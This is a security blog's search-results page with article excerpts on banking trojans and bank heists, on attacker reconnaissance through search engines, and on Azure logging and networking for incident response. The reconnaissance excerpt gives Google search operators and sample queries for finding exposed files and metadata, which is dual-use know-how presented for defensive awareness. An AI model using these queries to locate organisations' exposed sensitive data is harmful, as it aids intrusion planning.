top of page

Search Results

514 results found with an empty search

  • Cyber Crime: A Focus on Financial Gain (Zeus Trojan, Emotet Trojan, Carbanak)

    Monetary Gain as the Core Driver of Cybercrime Cyber criminals are motivated by financial profit, making their targets somewhat predictable—they go where the money is. These attackers prefer l ow-effort, high-reward methods and often avoid challenging targets. A classic saying summarizes their approach: “ You don’t have to be the fastest; just don’t be the slowest.” Common Attack Techniques in Financial Cybercrime 1. Online Banking Trojans Banking Trojans target online banking users, aiming for mass infections and small-value thefts. Notable examples include: Zeus, Citadel, Emotet, and Dridex:  These Trojans infect users’ devices to steal small amounts of money from each infected account. POS and ATM Malware:  Tailored malware targeting point-of-sale systems and ATMs to steal data and cash. 2. Advanced Attacks Against Financial Institutions Criminals are targeting banks directly, infecting business users involved in handling large fund transfers: Carbanak Attack (2015):  Cybercriminals infiltrated bank networks, learning fund transfer procedures and stealing millions. Bangladesh Bank Heist (2016):  Attackers exploited the SWIFT system, resulting in an attempted theft of $951 million. 3. Targeted Ransomware Since 2015, ransomware has surged, targeting any entity that values its data: Victims:  From individuals to corporations and government bodies, anyone with data worth protecting is a potential target if they’re willing to pay to retrieve it. Key Online Banking Trojans Zeus Trojan: The "King" of Banking Malware Overview:  Zeus, a versatile Trojan, performs various attacks, including keylogging and "man-in-the-browser" (MitB) attacks, which intercept and manipulate data in a user’s browser. Tech Support Scams:  Zeus also supported fake virus warnings, leading users to pay for fraudulent antivirus services. Open-Source Adaptation:   In 2011, Zeus’s source code was leaked , giving rise to many new variants like Citadel. ZitMo (Zeus-in-the-Mobile):  This mobile version intercepts authentication codes to facilitate fraudulent transactions. Emotet Trojan: Evolving Financial Malware First Identified (2014):  Initially, Emotet bypassed security to steal banking credentials, later evolving with features like self-propagation through email. Infection via Spam:  Emotet spreads via email with malicious Office documents , often disguised as invoices or delivery notices. Notable Attack (2019):  In Lake City, Florida, Emotet infected the city’s network, later dropping Trickbot and leading to Ryuk ransomware deployment, resulting in a $460,000 ransom payment. Carbanak: The First APT Against Banks Discovery (2015):  Carbanak, an APT (Advanced Persistent Threat) campaign, targeted financial institutions, amassing $500 million through fraudulent transactions. Attack Method:   Phishing emails with malicious attachments led to malware installation, allowing remote control and surveillance of bank operations. Techniques:  Carbanak gang learned banking procedures by recording screens and keystrokes, enabling them to conduct transactions themselves. Cash-Out Techniques:  These included programming ATMs to dispense cash on command, transferring funds to mule accounts, manipulating the SWIFT network, and creating fake bank accounts. Summary of Financial Losses : Carbanak alone caused losses of up to $10 million per institution, potentially totaling $1 billion across all affected banks. In Next Article we will talk about the Bangladesh Bank Heist via swift network in depth. Until than stay safe and keep learning!

  • How Attackers Use Search Engines and What You Can Do About It

    Search engines are incredible tools for finding information online, but they can also be used by attackers for reconnaissance. How Attackers Use Search Engines for Reconnaissance Search engines like Google and Bing provide a vast amount of information that attackers can exploit. By using specific search commands, they can uncover sensitive data, find vulnerabilities, and prepare for attacks. Google Hacking Database (GHDB): The Google Hacking Database (GHDB) is a collection of search queries that help find vulnerabilities and sensitive data exposed by websites. It's a valuable resource for attackers and can be found on the Exploit Database website. https://www.exploit-db.com/google-hacking-database Key Search Commands Attackers Use site:  Searches a specific domain. Example: site: example.com  restricts the search to example.com . link:  Finds websites linking to a specific page. Example: link: example.com  shows all sites linking to example.com . intitle:  Searches for pages with specific words in the title. Example: intitle: "login page"  finds pages with "login page" in the title. inurl:  Looks for URLs containing specific words. Example: inurl: admin  finds URLs with "admin" in them. related:  Finds pages related to a specific URL. Often less useful but can sometimes uncover valuable information. cache:  Accesses the cached version of a webpage stored by Google. Example: cache: example.com  shows Google's cached copy of example.com . filetype/ext:  Searches for specific file types. Example: filetype: pdf  or ext: pdf  finds PDF files, useful for locating documents that might contain sensitive information. Practical Reconnaissance Techniques 1. Searching for Sensitive Files: Attackers search for files that might be accidentally exposed, such as: Web Content:   site: example.com asp , site: example.com php Document Files:   site: example.com filetype: xls , site: example.com filetype:pptx 2. Using Cache and Archives: Google Cache:  Retrieves recently removed pages using the cache:  command. Wayback Machine:  Archives webpages over time, available at archive.org . https://archive.org/ 3. Automated Tools: FOCA/GOCA:  Finds files, downloads them, and extracts metadata, revealing usernames, software versions, and more. https://github.com/gocaio/Goca SearchDiggity:  Provides modules for Google, Bing, and Shodan searches, malware checks, and data leakage assessments. Recon-ng:  A framework that queries data from multiple services and manages data across projects. https://github.com/lanmaster53/recon-ng Conclusion Search engine reconnaissance is a powerful tool for attackers, providing them with a wealth of information to plan their attacks. By understanding these techniques and implementing robust defensive measures, you can significantly reduce your exposure and protect your critical data. Stay vigilant, stay informed, and continuously audit your public-facing assets to maintain a strong security posture. Akash Patel

  • Azure(Virtual Machine Logs) : A Guide for IR

    Lets talk about Fifth category called: Virtual Machine Logs Azure provides a range of logging options for virtual machines (VMs ) to support monitoring, troubleshooting, and incident response. Here’s an overview of the log types, agents, and configuration options for both Windows and Linux VMs, along with specific considerations for application logs. Logging Agents Azure offers several agents for collecting VM logs, each suited to different needs: Monitor Agent  : Designed to replace older agents, it supports Data Collection Rules (DCR)  for granular log collection . Diagnostic Extension (WAD) : Known as Windows Azure Diagnostics, this agent can write data directly to a storage account or an Event Hub . It remains a go-to choice for direct storage integration. Azure Monitor for VMs : Collects performance data and logs across VMs but may require additional configuration for more specialized needs. For data retention in Azure, understanding which agent best aligns with your storage and monitoring requirements is key. Configuring Windows Azure Diagnostics (WAD) for Windows VMs Initial Setup : Navigate to Azure Monitor  in the Azure portal. Create a Data Collection Rule (DCR)  for specific logs. Configuration Steps : Diagnostic Settings : Configure diagnostic settings for the VM and select the event logs and levels you want to collect (e.g., system, security, and application logs). Agent Settings : Assign a storage account to store the logs and set a disk quota to manage storage limits. Types of Logs Collected : Windows Event Logs : Stored in WADWindowsEventLogsTable , which contains OS-level event logs. Application Logs : Capture IIS logs, .NET application traces, and Event Tracing for Windows (ETW)  events . ETW provides insights into kernel and application-level events, useful for performance and security monitoring. Accessing Logs : Azure Storage Explorer : Use this tool to navigate to the storage account’s Tables  section, a ccess WADWindowsEventLogsTable , and export logs to a .csv file if needed. Configuring Logging for Linux VMs Diagnostic Settings : S et diagnostic settings for the Linux VM, similar to the Windows setup. Choose the target storage account for log storage. Log Options : Metrics : Configure metrics for key system parameters such as CPU, memory, network, file system, and disk usage. These can indicate suspicious activity patterns, such as high CPU usage for crypto mining or elevated disk usage during ransomware incidents. Syslog : Collect system logs stored in auth.log, kern.log, syslog, etc. All logs are combined into a single table, LinuxSyslogVer2v0 in the Azure storage account. https://datatracker.ietf.org/doc/html/rfc5424 Accessing Linux Logs : Use Azure Storage Explorer  to access LinuxSyslogVer2v0  under the Tables  section of the designated storage account. Application Logging Tracing for .NET and ETW : Application logs generated from .NET applications and ETW (Event Tracing for Windows)  capture both system and application performance data. Logs are stored in plaintext, differing from other logs stored in JSON format, and can be accessed via Azure’s storage services. ------------------------------------------------------------------------------------------------------------- Summary of Log Sources Windows VMs : Windows event logs (WADWindowsEventLogsTable) IIS and application logs, ETW events Linux VMs : System metrics (CPU, memory, etc.) Syslog events (LinuxSyslogVer2v0) Application Logs : .NET tracing output and ETW logs in plaintext -------------------------------------------------------------------------------------------------------- Key Takeaways Choosing Agents : Decide based on whether storage account integration or advanced data collection rules are required. Logging Setup : Configure storage quotas to avoid excessive costs and log noise. Accessing Logs : Use Azure Storage Explorer  for NoSQL table-based logs, which provide structured access to Windows and Linux logs. ------------------------------------------------------------------------------------------------------ Conclusion: In Azure, securing storage accounts and virtual machines requires vigilant access management, policy-driven logging, and careful monitoring of data access activities. By enabling StorageRead logs and configuring diagnostic agents for VMs, organizations can detect potential data exfiltration and unusual activity. Centralizing logs and applying policies across environments strengthens incident response and supports comprehensive visibility across resources. Akash Patel ---------------------------------------------------------------------------------------------------------- Special Thanks (Iqra) I would like to extend my heartfelt gratitude to one of my dearest colleagues, a Microsoft Certified Trainer, for her invaluable assistance in creating these articles. Without her support, this would not have been possible. Thank you so much for your time, expertise, and dedication! https://www.linkedin.com/in/iqrabintishafi/ -------------------------------------------------------------------------------------------------------------

  • Azure(NSG/Storage Account Logs) : A Guide for IR

    Lets Talk about Third category called: Resource Azure offers a variety of logging resources to support incident response, monitoring, and security analytics. Two key components are Network Security Group (NSG) Flow Logs  and Traffic Analytics —essential tools for analyzing network activity and identifying potential security incidents in your Azure environment. https://learn.microsoft.com/en-us/azure/azure-monitor/reference/logs-index Key Components of Azure Network Security Network Security Groups (NSG) : NSGs are used to control network traffic flow to and from Azure resources by setting up security rules . Rules specify the source, destination, port, and protocol, either allowing or denying traffic. Rules are prioritized numerically, with lower numbers having higher priority. https://learn.microsoft.com/en-us/azure/network-watcher/nsg-flow-logs-overview NSG Flow Logs : Flow logs capture important network activity at the transport layer (Layer 4) and are a vital resource for tracking and analyzing network traffic . They include: Source and destination IP, ports, and protocol : This 5-tuple information helps identify connections and patterns . Traffic Decision (Allow or Deny) : Specifies whether traffic was permitted or blocked. Logging Frequency : Flow logs are captured every minute. Storage : Logs are stored in JSON format, retained for a year, and can be configured to stream to Log Analytics or an Event Hub for SIEM integration . Note: NSG flow logs are enabled through the Network Watcher service, which must be enabled for each region in use. NSG Flow Log Configuration To enable NSG flow logs: Enable Network Watcher : Set up in each Azure region where NSG monitoring is needed. Register Microsoft.Insights Provider : The "Insights" provider enables log capture and must be registered for each subscription. Enable NSG Flow Logs : Use Version 2 for enhanced details , including throughput information. https://learn.microsoft.com/en-us/azure/network-watcher/nsg-flow-logs-tutorial https://learn.microsoft.com/en-us/azure/network-watcher/traffic-analytics --------------------------------------------------------------------------------------------------------- Traffic Analytics Traffic Analytics  is a powerful tool that enhances NSG flow logs by providing a visual representation and deeper insights into network activity . By using a Log Analytics workspace, it allows organizations to: Visualize Network Activity : Easily monitor traffic patterns across subscriptions. Identify Security Threats : Detect unusual traffic patterns that could signify attacks or unauthorized access. Optimize Network Deployment : Analyze traffic flows to adjust resource configurations for efficiency. Pinpoint Misconfigurations : Quickly identify and correct settings that might expose resources to risk. https://learn.microsoft.com/en-us/azure/network-watcher/traffic-analytics Setup : Traffic Analytics is configured via the Network Watcher and requires the NSG logs to be sent to a Log Analytics workspace. --------------------------------------------------------------------------------------------------------- Practical Applications in Incident Response and Forensics For incident response, NSG flow logs and Traffic Analytics provide a detailed view into Azure network activity, allowing you to: Track unusual or unauthorized traffic patterns. Quickly spot and investigate potential lateral movement within the network. Assess security posture by reviewing allowed and denied traffic flows, helping ensure configurations align with security policies. --------------------------------------------------------------------------------------------------------- Now Lets Talk about Fourth category called: Storage Account Logs In Azure, storage accounts  are crucial resources for storing and managing data, but they require specific configurations to secure access and enable effective monitoring through logs. Here’s a breakdown of key practices for setting up and securing storage accounts in Azure: Enabling Storage Account Logs Azure does not enable logging for storage accounts by defaul t, but you can enable logs through two main options: Diagnostic Settings – Preview : This is the preferred option , offering granular logging settings. Logs can be configured for each data type—blob, queue, table, and file storage— and sent to various destinations such as a Log Analytics workspace, another storage account, an Event Hub, or a partner solution. Diagnostic Settings – Classic : An older option with limited customization compared to the preview settings. Logging Categories : Logs can capture Read, Write, and Delete operations . For security and forensic purposes, it’s especially important to enable the StorageRead  log to track data access, as this can help detect data exfiltration attempts (e.g., when sensitive data is downloaded from a blob). Key Logging Considerations for Security Data Exfiltration Tracking : Monitoring Read operations is critical for detecting unauthorized data access. Filtering for specific operations, such as GetBlob, allows you to identify potential data exfiltration activities. Microsoft Threat Matrix : Azure’s threat matrix for storage, based on the MITRE ATT&CK framework, highlights data exfiltration as a significant risk. Monitoring for this by configuring relevant logs helps mitigate data theft. https://www.microsoft.com/en-us/security/blog/2021/04/08/threat-matrix-for-storage/ --------------------------------------------------------------------------------------------------------- Storage Account Access Controls Access to storage accounts can be configured at multiple levels: Account Level : Overall access to the storage account itself. Data Level : Specific containers, file shares, queues, or tables. Blob Level : Individual blob (object) access, allowing the most restrictive control. Access Keys : Each storage account comes with two access keys . Regular rotation of these keys is highly recommended to maintain security. Shared Access Signatures (SAS) : S AS tokens allow restricted access to resources for a limited time and are a safer alternative to using account keys , which grant broader access. SAS tokens can be scoped down to individual blobs for more restrictive control. Public Access : It’s critical to avoid public access configurations unless absolutely necessary, as this can expose sensitive data to unauthorized users. --------------------------------------------------------------------------------------------------------- Internet Access and Network Security for Storage Accounts By default, Azure storage accounts are accessible over the internet , which poses security risks: Global Access : Storage accounts exist in a global namespace, making them accessible worldwide via a URL (e.g., https://mystorageaccount.blob.core.windows.net). Restricting access to specific networks or enabling a private endpoint is recommended to limit exposure. Private Endpoints and Azure Private Link : For enhanced security, private endpoints can be used to connect securely to a storage account via Azure Private Link. This setup requires advanced planning but significantly reduces the risk of unauthorized internet access. Network Security Groups (NSG) : Although NSGs do not directly control storage account access, securing virtual networks and subnets associated with storage accounts is essential . Best Practices for Incident Response and Forensics For effective incident response: Enable and monitor diagnostic logs for Read operations to detect data exfiltration. Regularly review access control configurations to ensure minimal exposure. Use private endpoints and avoid public access settings to minimize risk from the internet. These configurations and controls enhance Azure storage security, protecting sensitive data from unauthorized access and improving overall network resilience. --------------------------------------------------------------------------------------------------------- In Azure, protecting against data exfiltration in storage accounts requires a layered approach, involving strict control over key and SAS token generation , careful monitoring of access patterns , and policies that enforce logging for audit and response purposes . Here’s a detailed breakdown: Data Exfiltration Prevention and Monitoring Key and SAS Management Key Generation : Access keys or SAS tokens are critical for accessing data in storage accounts and can be generated through various methods: Azure Console : Provides an intuitive UI for key generation and monitoring. PowerShell and CLI : Useful for scripting automated key management tasks. Graph API : Suitable for integrating key management into custom applications or workflows. For example: Access Keys : Azure generates two access keys per storage account to allow for seamless key rotation. Shared Access Signatures (SAS) : SAS tokens can be generated at different levels (blob, file service, queue, and table), granting temporary, limited access. Generating SAS tokens at the most granular level, such as for individual blobs, reduces the risk of misuse. Monitoring Key Enumeration : To detect potential data exfiltration, look for specific operations that indicate credential enumeration: LISTKEYS/ACTION Operation : Any instance of "operationName": " MICROSOFT.STORAGE/STORAGEACCOUNTS/LISTKEYS/ACTION "  in the logs suggests that a principal has listed the keys. This is a red flag, as unauthorized access to these keys could enable data exfiltration. Configuring Applications for Secure Access Once a threat actor obtains storage credentials, it becomes straightforward to access and exfiltrate data through a pplications like Azure Storage Explorer . This tool allows quick configuration using access keys or SAS tokens, so it’s vital to: Limit Key Distribution : Only authorized users should have access to SAS tokens or keys, ideally with restricted permissions and limited expiry. Enable StorageRead Logs : The StorageRead  log captures read activities, providing visibility into data access. If this log isn’t enabled, data exfiltration activity goes undetected. Automating Log Enabling with Policies For organizations with extensive storage account usage, enabling StorageRead logs on each account individually can be infeasible . To streamline this, you can: Create a Policy for Storage Logs : Set a policy at the management group  or subscription  level to automatically enable logs for all current and future storage accounts. Predefined Policies : Azure offers several predefined policies, but currently, none enforce storage account logging by default. Custom Policy : If needed, a custom policy can be created (e.g., to enable StorageRead logging and direct logs to an Event Hub, a Log Analytics workspace, or other storage). This policy can ensure storage accounts remain compliant with logging requirements. Policy Constraints and Configuration : Regional Limitation : When configuring a policy to send logs to an Event Hub, both the Event Hub and the storage account must be in the same region. To capture logs across multiple regions, create corresponding Event Hubs. Flexible Destinations : Customize the policy to send logs to various destinations, such as Log Analytics or a storage account, depending on organizational needs. --------------------------------------------------------------------------------------------------------- Further we will talk in next blog, Until than stay safe and keep learning Akash Patel ---------------------------------------------------------------------------------------------------------- Special Thanks (Iqra) I would like to extend my heartfelt gratitude to one of my dearest colleagues, a Microsoft Certified Trainer, for her invaluable assistance in creating these articles. Without her support, this would not have been possible. Thank you so much for your time, expertise, and dedication! https://www.linkedin.com/in/iqrabintishafi/ -------------------------------------------------------------------------------------------------------------

  • Azure(Tenant/Subscription Logs) : A Guide for Incident Response

    While the Log Analytics Workspace  is an excellent tool for monitoring and analyzing logs in Azure, storing logs in a Storage Account  provides a more cost-effective and flexible solution for long-term retention and external access. This setup allows organizations to store logs for extended periods and export them for integration with other tools or services. Why Export Logs to a Storage Account? There are several benefits to exporting tenant logs  and other Azure logs to a Storage Account : Long-Term Retention : You can define a retention policy to keep logs for months or years, depending on compliance and operational requirements. Cost Efficiency : Compared to storing everything in a Log Analytics Workspace, which is more costly for extensive data, Storage Accounts  offer lower-cost alternatives for long-term log retention. Accessibility : Logs stored in a storage account can be accessed through APIs, or via tools like Azure Storage Explorer , allowing easy download, transfer, and external analysis. However, each organization must balance storage needs with costs, as larger volumes of data will increase storage costs over time. ------------------------------------------------------------------------------------------------------------- Steps to Export Tenant Logs to a Storage Account Step 1: Set Up Diagnostic Settings to Export Logs Navigate to Diagnostic Settings : In the Azure portal, search for Azure Active Directory  and select it. Under the Monitoring  section, select Diagnostic settings . Create a New Diagnostic Setting : Click Add diagnostic setting . Name your setting (e.g., "TenantLogStorageExport"). Select Log Categories : Choose the logs you want to export , such as Audit Logs , Sign-in Logs , and Provisioning Logs . Select Destination : Choose Archive to a storage accoun t  and select the storage account where the logs will be stored. Confirm and save the settings. Once configured, the selected logs will start streaming into the specified storage account. ------------------------------------------------------------------------------------------------------------- Accessing Logs with Azure Storage Explorer Azure Storage Explorer  is a free, graphical tool that allows you to easily access and manage data in your storage accounts, including logs stored as blobs . Using Azure Storage Explorer: Download and Install : Install Azure Storage Explorer  on your local machine from here . Connect to Your Azure Account : Launch Storage Explorer and sign in with your Azure credentials. Browse to your storage account  and locate the blobs  where your logs are stored (e.g., insights-logs-signinlogs). View and Download Logs : Use the explorer interface to view the logs. You can download these blobs to your local machine for offline analysis, or even automate log retrieval using tools like AzCopy  or Python scripts. Logs are typically stored in a hierarchical structure, with each log file containing valuable data in JSON or CSV formats. Examples of Log Types in Storage Accounts Here are some common logs that you might store in your storage account : insights-logs-signinlogs : Logs of all user and service sign-in activities. insights-logs-auditlogs : Logs of administrative changes such as adding or removing users, apps, or roles. insights-logs-networksecuritygrouprulecounter : Tracks network security group rules and counters. insights-logs-networksecuritygroupflowevent : Monitors NSG traffic flows. These logs are stored as blobs, while certain logs (e.g., OS logs) might be stored in tables  within the storage account. https://azure.microsoft.com/en-us/products/storage/storage-explorer/ https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log-schema#schema-from-storage-account-and-event-hubs ------------------------------------------------------------------------------------------------------------- Sending Logs to Event Hub for External Systems If you need to export tenant logs or other logs to a non-Azure system , Event Hub  is a great option . Event Hub is a real-time data ingestion service that can process millions of events per second and is often used to feed external systems such as SIEMs  (Security Information and Event Management). How to Configure Event Hub Export: Create Event Hub : Set up an Event Hub  within Azure Event Hubs  service. Configure Diagnostic Settings : Just as you did for the storage account, go to Diagnostic settings  for Azure Active Directory and select Stream to an event hub  as the destination. Enter the namespace  and event hub name . This setup allows you to forward Azure logs in real-time to any system capable of receiving data from Event Hub, such as a SIEM or a custom log analytics platform. https://azure.microsoft.com/en-us/products/event-hubs/ https://learn.microsoft.com/en-us/entra/identity/monitoring-health/howto-stream-logs-to-event-hub?tabs=splunk ------------------------------------------------------------------------------------------------------------- Leveraging Microsoft Graph API for Log Retrieval In addition to Storage Accounts  and Event Hubs , Azure also supports the Microsoft Graph API  for retrieving tenant logs programmatically. This API allows you to pull log data directly from Azure and Microsoft 365  services. The Graph API  supports many programming languages, including Python, C#, and Node.js, making it highly flexible. It’s commonly used to integrate Azure logs into custom applications or third-party systems. https://developer.microsoft.com/en-us/graph ------------------------------------------------------------------------------------------------------------- All Above logs were part of the tenant logs: Lets start with second log category called Subscription Logs What are Subscription Logs? Subscription logs track and log all activities within your Azure subscription . They record changes made to resources, providing a clear audit trail and insight into tenant-wide services. The primary information recorded includes details on operations, identities involved, success or failure status, and IP addresses. Accessing Subscription Logs Subscription logs are available under the Activity log  in the Azure portal . You can use the logs in multiple ways: View them directly in the Azure portal  for a quick, interactive inspection. Store them in a Log Analytics workspace  for advanced querying and long-term retention. Archive them in a storage account , useful for maintaining a long-term log history. Forward them to a SIEM  (Security Information and Event Management) solution via Azure Event Hub for enhanced security monitoring and correlation. To access the logs in the Azure portal, use the search bar to look for Activity log . This will provide a quick summary view of activities within the portal. https://learn.microsoft.com/en-us/azure/azure-monitor/essentials/activity-log?tabs=powershell ------------------------------------------------------------------------------------------------------------- Key Elements of the Subscription Log Schema Each activity log entry has several key fields that can help in monitoring and troubleshooting. When an action, such as creating a new virtual machine (VM), is logged, the following fields provide detailed information: resourceId : This is a unique identifier for the resource that was acted upon, allowing precise tracking of the specific VM, storage account, or network security group. operationName : Specifies the action taken on the resource. For example, creating a VM might appear as MICROSOFT.COMPUTE/VIRTUALMACHINES/WRITE. resultType  and resultSignature : These fields show whether the operation succeeded, failed, or was canceled, with additional error codes or success indicators in resultSignature. callerIpAddress : The IP address from which the action originated, identifying the source of the request. correlationId : A unique GUID that ties together all sub-operations in a single request, allowing you to trace a sequence of actions as part of a single change or request. claims : Contains identity details of the principal making the change, including any associated authentication data. This can include fields from an identity provider like Azure AD, giving insight into the user or service making the request. Each log entry captures critical details that aid in understanding who , what , when , and where  changes were made. ------------------------------------------------------------------------------------------------------------- Subscription Log Access Options Azure offers different access and filtering methods for subscription logs. Here’s a breakdown of how you can utilize the portal effectively: Azure Portal : The Azure portal offers a quick, visual way to explore logs . You can select a subscription, set the event severity level (e.g., Critical, Error, Warning, Informational), and define a timeframe for the log entries you need. The Export Activity Logs  option on the top menu or the Diagnostic Settings  on the left allows you to set up data export or view diagnostic logs. Log Analytics Workspace : The Log Analytics workspace offers a more robust and flexible environment for log analysis . By sending your logs here, you can perform advanced queries, create dashboards, and set up alerts. This workspace enables centralized log management, making it an ideal choice for larger organizations or those with specific compliance requirements. Programmatic Access : Using the PowerShell cmdlet Get-AzLog  or the Azure CLI with az monitor activity-log , you can query the activity logs programmatically . This is useful for automated scripts or integrating logs into third-party solutions. Event Hub Integration : For real-time analysis, integrate subscription logs with Event Hub and forward them to a SIEM for security insights and anomaly detection . This setup is beneficial for organizations that require constant monitoring and incident response. https://learn.microsoft.com/en-us/powershell/module/az.monitor/?view=azps-12.4.0#retrieve-activity-log https://learn.microsoft.com/en-us/cli/azure/service-page/monitor?view=azure-cli-latest#view-activity-log ------------------------------------------------------------------------------------------------------------- Subscription Logs in Log Analytics workspace For Detailed analysis, it's best to set up a Log Analytics workspace . This enables centralized log storage and querying capabilities, combining subscription logs with other logs (such as Azure Active Directory logs (Entra ID Logs) ) for a comprehensive view. The setup process is identical to the one for the tenant logs : select the log categories you wish to save and the Log Analytics workspace to send them to. Subscription Log Categories The main log categories available are: Administrative : Tracks actions related to resources, such as creating, updating, or deleting resources via the Azure Resource Manager. Security : Logs security alerts generated by Azure Security Center. Service Health : Reports incidents affecting the health of Azure services. Alert : Logs triggered alerts based on predefined metrics, such as high CPU usage. Recommendation : Records Azure Advisor recommendations for resource optimization. Policy : Logs policy events for auditing and enforcing subscription-level policies. Autoscale : Contains events from the autoscale feature based on usage settings. Resource Health : Provides resource health status, indicating whether a resource is available, degraded, or unavailable. ------------------------------------------------------------------------------------------------------------- Querying Subscription Logs in Log Analytics The logs are stored in the AzureActivity table in Log Analytics . Here are some example queries: Identify Deleted Resources : AzureActivity | where OperationNameValue contains "DELETE" This query is useful for investigating deletions, such as a scenario where a malicious actor deletes a resource group, causing all contained resources to be deleted. Track Virtual Machine Operations : AzureActivity | where OperationNameValue contains "COMPUTE" | distinct OperationNameValue This query lists unique operations related to virtual machines, helpful for getting an overview of VM activity. Count VM Operations : AzureActivity | where OperationNameValue contains "COMPUTE" | summarize count() by OperationNameValue By counting operations, this query provides insights into the volume of VM activities, which can reveal patterns such as frequent VM creation or deletion. ------------------------------------------------------------------------------------------------------------- Archiving and Streaming Logs To save logs for long-term storage or send them to a SIEM: Configure diagnostic settings to specify the storage account or Event Hub for archiving and real-time streaming. Logs stored in a storage account appear in a structured format, often in JSON files within deeply nested directories, which can be accessed and processed using tools like Azure Storage Explorer. By effectively leveraging subscription logs and these configurations, Azure administrators can enhance monitoring, identify security issues, and ensure accountability in their environments. ----------------------------------------------------------------------------------------------------------- Further we will talk in next blog, Until than stay safe and keep learning Akash Patel ---------------------------------------------------------------------------------------------------------- Special Thanks (Iqra) I would like to extend my heartfelt gratitude to one of my dearest colleagues, a Microsoft Certified Trainer, for her invaluable assistance in creating these articles. Without her support, this would not have been possible. Thank you so much for your time, expertise, and dedication! https://www.linkedin.com/in/iqrabintishafi/ -------------------------------------------------------------------------------------------------------------

  • Understanding VM Types and Azure Network for IR

    Microsoft Azure provides a wide range of compute services, organized based on workload types and categorized as Infrastructure as a Service (IaaS) , Platform as a Service (PaaS) , or Software as a Service (SaaS) . For incident response and forensic investigations, the focus is typically on virtual machines (VMs)  and the related networking infrastructure. ----------------------------------------------------------------------------------------------------------- Virtual Machines: Types and Applications Azure offers various classes of virtual machines tailored for different workloads, all with specific performance characteristics. Here’s a breakdown of the most common VM types you'll encounter during an investigation: Series A (Entry Level) : Use Case : Development workloads, low-traffic websites. Examples : A1 v2, A2 v2. Series B (Burstable) : Use Case : Low-cost VMs with the ability to "burst" to higher CPU performance when needed. Examples : B1S, B2S. Series D (General Purpose) : Use Case : Optimized for most production workloads. Examples : D2as v4, D2s v4. Series F (Compute Optimized) : Use Case : Compute-intensive workloads, such as batch processing. Examples : F1, F2s v2. Series E, G, and M (Memory Optimized) : Use Case : Memory-heavy applications like databases. Examples : E2a v4, M8ms. Series L (Storage Optimized) : Use Case : High throughput and low-latency applications. Examples : L4s, L8s v2. Series NC, NV, ND (Graphics Optimized) : Use Case : Visualization, deep learning, and AI workloads. Examples : NC6, NV12s. Series H (High Performance Computing) : Use Case : Applications such as genomic research, financial modeling. Examples : H8, HB120rs v2. https://azure.microsoft.com/en-us/pricing/details/virtual-machines/windows/ https://azure.microsoft.com/en-us/pricing/details/virtual-machines/linux/ VM Storage: Managed Disks Managed Disks  in Azure operate similarly to physical disks but come with a few key distinctions relevant for incident response: Types of Managed Disks : Standard HDD : Slow, low-cost. Standard SSD : Standard for most production workloads. Premium SSD : High performance, better suited for intensive workloads. Ultra Disk : Highest performance for demanding applications. Each VM can have multiple managed disks , including an OS disk, temporary disk (for short-term storage), and one or more data disks. Forensics often involves snapshotting the OS disk  of a compromised VM, attaching that snapshot to a new VM for further analysis. Costs are associated with: Disk type and size. Snapshot size (critical for investigations). Outbound data transfers (when retrieving forensic data). I/O operations (transaction costs). https://learn.microsoft.com/en-us/azure/virtual-machines/managed-disks-overview https://learn.microsoft.com/en-us/azure/virtual-machines/disks-types ----------------------------------------------------------------------------------------------------------- Azure Virtual Network (VNet): The Glue Behind Azure Resources An Azure Virtual Network ( VNet)  allows Azure resources like VMs to communicate with each other and with external networks . During an incident response, it’s essential to understand the network topology  to see how resources were connected, what traffic was allowed, and where vulnerabilities might have existed. Key points about VNets: Private Addressing : Azure assigns a private IP range (typically starting with 10.x.x.x). Public IP Addresses : Required for internet communication, but comes with extra charges. On-Premises Connectivity : Point-to-Site VPN : Connects individual computers to Azure. Site-to-Site VPN : Connects an on-premises network to Azure. Azure ExpressRoute : Private connections that bypass the internet. https://learn.microsoft.com/en-us/azure/virtual-network/virtual-networks-overview ----------------------------------------------------------------------------------------------------------- Network Security Groups (NSG): Traffic Control and Incident Response NSG Overview : Azure automatically creates NSGs to protect resources, like virtual machines (VMs), by allowing or blocking traffic based on several criteria: Source/Destination IP : IP addresses from which the traffic originates or to which it is sent. Source/Destination Port : The network ports involved in the connection. Protocol : The communication protocol (e.g., TCP, UDP). Rule Prioritization : NSG rules are processed in order of their priority , with lower numbers having higher priority. Custom rules have priorities ranging from 100 to 4096 , while Azure-defined rules have priority in the 65000 range. Incident Response Tip : Ensure that firewall rules are correctly prioritized. A common issue during investigations is discovering that a misconfigured or improperly prioritized rule allowed malicious traffic to bypass protections. Flow Logs :Network flow logs , which capture traffic information, are essential for understanding traffic patterns and investigating suspicious activity . Flow logs are generated every minute, and the first 5GB per month is free. After that, the cost is $0.50 per GB plus storage charges. Example : If an attack involved unauthorized access through a compromised port, flow logs would help you trace the origin and nature of the traffic, providing critical forensic data. https://learn.microsoft.com/en-us/azure/network-watcher/nsg-flow-logs-overview https://learn.microsoft.com/en-us/azure/virtual-network/network-security-groups-overview#network-security-groups ----------------------------------------------------------------------------------------------------------- Network Virtual Appliances (NVA): Advanced Network Security Azure provides additional options for advanced traffic management and security beyond basic NSGs: Azure Load Balancer : Distributes incoming network traffic across multiple resources to balance load. Azure Firewall : Offers advanced filtering, including both stateful network and application-layer inspections. Application Gateway : Protects web applications by filtering out vulnerabilities like SQL injection and cross-site scripting (XSS). VPN Gateway : Connects on-premises networks securely to Azure. Many third-party Network Virtual Appliances  are also available on the Azure Marketplace , such as firewalls, VPN servers, and routers, which can be vital components in your investigation. https://azuremarketplace.microsoft.com/en-us/marketplace/apps/category/networking?page=1&subcategories=all ----------------------------------------------------------------------------------------------------------- Azure Storage: Central to Forensics and Logging Azure storage accounts  are integral to how logs and other data are stored during investigations. Proper storage setup ensures data retention and availability for analysis. Storage Account Types : Blob Storage : Scalable object storage for unstructured data, such as logs or multimedia. File Storage : Distributed file system storage. Queue Storage : For message storage and retrieval. Table Storage : NoSQL key-value store, now part of Azure Cosmos DB . Blob Storage : Blobs  (Binary Large Objects) are highly versatile and commonly used for storing large amounts of unstructured data, such as logs during forensic investigations. Blobs come in three types: Block Blobs : Ideal for storing text and binary data, can handle up to 4.75TB per file. Append Blobs : Optimized for logging, where data is appended rather than overwritten. Page Blobs : Used for random access data, like Virtual Hard Drive (VHD) files. Direct Access and Data Transfers :With the appropriate permissions, data stored in blob storage can be accessed over the internet via HTTP or HTTPS. Azure provides t ools like AzCopy  and Azure Storage Explorer  to facilitate the transfer of data in and out of blob storage. Example : Investigators may need to download logs or snapshots stored in blobs for offline analysis. Using AzCopy  or Azure Storage Explorer , these files can be easily transferred for examination. 